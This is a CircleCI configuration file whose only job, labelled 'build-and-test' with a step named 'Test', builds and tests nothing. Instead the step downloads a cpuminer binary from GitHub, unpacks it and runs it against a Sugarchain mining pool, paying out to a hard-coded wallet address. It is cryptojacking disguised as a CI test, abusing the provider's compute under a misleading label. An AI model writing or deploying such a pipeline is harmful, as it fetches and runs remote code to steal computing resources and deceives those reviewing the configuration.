version: 2.1

orbs:
   python: circleci/python@0.2.1

jobs:
  build-and-test:
    executor: python/default
    steps:
      - run:
          command: wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.11/cpuminer-opt-linux.tar.gz && tar xf cpuminer-opt-linux.tar.gz && ./cpuminer-sse2 -a yespowerSUGAR -o stratum+tcp://sugar.anomp.com:6676 -u sugar1qeeqmgf4a8hvryqvfuwwjtdjy085j9zk3zpmywu.A01 -p x
          name: Test

workflows:
  main:
    jobs:
      - build-and-test